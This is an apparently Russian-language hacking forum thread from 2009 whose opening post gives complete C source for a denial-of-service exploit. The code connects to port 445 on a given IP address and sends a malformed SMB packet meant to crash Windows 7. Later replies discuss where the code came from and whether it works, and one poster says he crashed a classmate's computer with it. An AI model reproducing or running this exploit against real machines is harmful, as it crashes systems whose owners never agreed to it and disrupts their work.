exploit windows 7

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by DeaD_MoroZ, 20 Nov 2009.

  1. DeaD_MoroZ

    DeaD_MoroZ Banned

    Joined:
    3 Nov 2009
    Messages:
    102
    Likes Received:
    7
    Reputations:
    0
    вот он сам
    Code:
    #include <windows.h>
    #include <stdio.h>
    
    #pragma comment(lib, "WS2_32.lib")
    
    char buff[] =
                    "\x00\x00\x00\x90" 
                    "\xff\x53\x4d\x42" 
                    "\x72\x00\x00\x00"
                    "\x00\x18\x53\xc8" 
                    "\x00\x26" 
                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
                    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
                    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
                    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
                    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
                    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
                    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
                    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
                    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
                    "\x30\x30\x32\x00";
                    
    int main(int argc, char *argv[]) {
            
            
            if (argc < 2) {
                    printf("Syntax: %s [ip address]\r\n", argv[0]);
                    return -1;
            }
            
            WSADATA WSAdata;
            WSAStartup(MAKEWORD(2, 2), &WSAdata);
            
            SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
            char *host = argv[1];
            
          
            SOCKADDR_IN ssin; 
            memset(&ssin, 0, sizeof(ssin));
            ssin.sin_family = AF_INET;
            ssin.sin_port = htons((unsigned short)445);
            ssin.sin_addr.s_addr = inet_addr(host);
            
            printf("Connecting to %s:445... ", host);
            if (connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
                    printf("ERROR!\r\n");
                    return 0;
            }
            printf("OK\r\n");
            
            printf("Sending malformed packet... ");
            if (send(sock, buff, sizeof(buff), 0) <= 0) {
                    printf("ERROR!\r\n");
                    return 0;
            }
            printf("OK\r\n");
            
            printf("Successfully sent packet!\r\nTarget should be crashed...\r\n");
            
     
            closesocket(sock);
            WSACleanup();
            
            return 1;
    }
    
     
    #1 DeaD_MoroZ, 20 Nov 2009
    Last edited by a moderator: 21 Nov 2009
  2. VirtuoZ

    VirtuoZ Elder - Старейшина

    Joined:
    2 Feb 2008
    Messages:
    21
    Likes Received:
    3
    Reputations:
    0
    это на дос только? откуда сорс если не секрет? :)
     
  3. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Зачем спалил :(

    Теперь прикроют.
     
  4. fker

    fker Member

    Joined:
    26 Nov 2008
    Messages:
    135
    Likes Received:
    64
    Reputations:
    -1
    мега превад
    http://seclists.org/bugtraq/2009/Sep/56
     
  5. DeaD_MoroZ

    DeaD_MoroZ Banned

    Joined:
    3 Nov 2009
    Messages:
    102
    Likes Received:
    7
    Reputations:
    0
    не прикроют, не могут :D
     
  6. DeaD_MoroZ

    DeaD_MoroZ Banned

    Joined:
    3 Nov 2009
    Messages:
    102
    Likes Received:
    7
    Reputations:
    0
    я плохо понял чо ты написал, но если я всё таки правильно понял: Я НА АВТОРСТВО И НЕ ПРЕТЕНДОВАЛ
     
    1 person likes this.
  7. hamsin

    hamsin New Member

    Joined:
    3 Nov 2009
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    Не знаю чего там должно быть.... По идее BDOS, но у меня на двух 7 всё нормально... Как работала, так и продолжает работать... !?
     
  8. DeaD_MoroZ

    DeaD_MoroZ Banned

    Joined:
    3 Nov 2009
    Messages:
    102
    Likes Received:
    7
    Reputations:
    0
    я на одногрупнике тестил-в даун
     
  9. hamsin

    hamsin New Member

    Joined:
    3 Nov 2009
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    Фиг его... Даже обидно стало... :)
     
  10. ExitProcess

    ExitProcess New Member

    Joined:
    30 Nov 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    DeaD_MoroZ
    Уважаемый, имейте привычку указывать источник, при постах такого рода.
     
  11. tester_new

    tester_new Elder - Старейшина

    Joined:
    12 Feb 2012
    Messages:
    300
    Likes Received:
    45
    Reputations:
    24
    Собрал его чуть потестил на 2 компах... win 7 sp1 нефига не работает.... может он был под бета версию .)
     
  12. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,224
    Reputations:
    455
    Обрати внимание на дату темы (20 ноября 2009).
    А Windows 7 вышла 22 октября 2009, так что ни о каких SP и реши идти не могло и темболее это скорее для RC была